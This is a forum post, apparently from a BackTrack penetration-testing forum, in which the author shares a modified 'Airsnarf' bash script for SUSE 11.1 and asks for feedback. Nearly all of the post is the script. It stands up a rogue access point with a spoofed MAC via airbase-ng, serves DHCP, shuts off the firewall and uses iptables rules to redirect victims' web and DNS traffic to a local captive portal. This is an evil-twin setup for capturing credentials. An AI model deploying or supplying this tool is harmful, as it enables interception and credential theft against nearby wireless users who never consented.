HACKED AIRSNARF for Suse 11.1

**omegadamage** · 07-29-2009, 08:54 AM

This is a hacked arisnarf script in a partial form if you want to have the whole script pls let me know what you know. THANKS

-----------------------------------------------------

Code:

#!/bin/bash -x
# airsnarf.sh
# A rogue AP setup utility.
:
echo "Airsnarf - A rogue AP setup utility."
echo "0.2"
echo "The Shmoo Group"
echo "------------------------------------"
# here are some variables you may want to edit
declare WWW_ROOT="/usr/local/apache/htdocs"
declare CGI_ROOT="/usr/local/apache/cgi-bin"
declare LOCAL_CFG="./cfg"
declare SPOOFEDMAC="00:34:67:77:34:8A"

# specify another config dir with a command line arg if you want
if [ $1 ]; then
LOCAL_CFG="$1"
fi

source $LOCAL_CFG/airsnarf.cfg

# create the dhcpd.conf
echo -n "Creating dhcpd.conf..."
sed s/AIRSNARF/$ROGUE_NET/g ./etc/dhcpd.src > /etc/dhcpd.conf
echo "Done."

sleep 4
# copy over the www stuff
echo -n "Building the captive portal..."
cp $LOCAL_CFG/html/* $WWW_ROOT
cp $LOCAL_CFG/cgi-bin/* $CGI_ROOT
chmod +x $CGI_ROOT/*
echo "Done."

# set our wireless parameters
echo -n "Setting the wireless parameters..."
#Commented the below line out so other code could be tested Kyle
#iwconfig $ROGUE_INTERFACE essid $ROGUE_SSID mode master
airmon-ng stop $ROGUE_INTERFACE
airmon-ng stop $PHYS_INTERFACE


airmon-ng start $PHYS_INTERFACE
sleep 2

xterm -e "airbase-ng -a $SPOOFEDMAC -e $ROGUE_SSID -P -C 30 -v -c 11 $ROGUE_INTERFACE;bash" & 

sleep 4
echo "Done."

# set our ip and default route
echo -n "Setting the ip address and default route..."
ifconfig $AP_INTERFACE $ROGUE_GW

#ifconfig $ROGUE_INTERFACE $ROGUE_GW commented out for testing
route add -net 0.0.0.0 gw $ROGUE_GW
echo "Done."

# restart and stop some services
apachectl start
/etc/init.d/dhcpd stop
/etc/init.d/httpd restart
/etc/init.d/sendmail restart
echo -n "Shutting down current firewall please wait"
SuSEfirewall2 stop
service SuSEfirewall2_init stop

# set up the firewall to redirect
echo -n "Setting up firewall to redirect DNS..."
echo 1 > /proc/sys/net/ipv4/ip_forward
modprobe -v iptable_nat

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -F -t nat


iptables -t nat -A PREROUTING -i $AP_INTERFACE -j REDIRECT

iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface $AP_INTERFACE -j ACCEPT

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

# home web page to start from
echo "Users are going to see the website with this iptable rule"
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \
--to $ROGUE_GW
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT \
--to $ROGUE_GW

iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT \
--to $ROGUE_GW
echo "Done."
#Starting dhcpd to lease ip addresses for hosts on at0
xterm -e "dhcpd -d -f -cf /etc/dhcpd.conf $AP_INTERFACE;bash" &
# start the local dns resolver
echo "Starting local DNS resolver..."
chmod +x ./bin/airsnarf_dns.pl
./bin/airsnarf_dns.pl

Tell me what you think!!

omegadamage

BackTrack Linux - Penetration Testing Distribution

Thread: HACKED AIRSNARF for Suse 11.1

Thread Tools

Search Thread

Display

HACKED AIRSNARF for Suse 11.1

Posting Permissions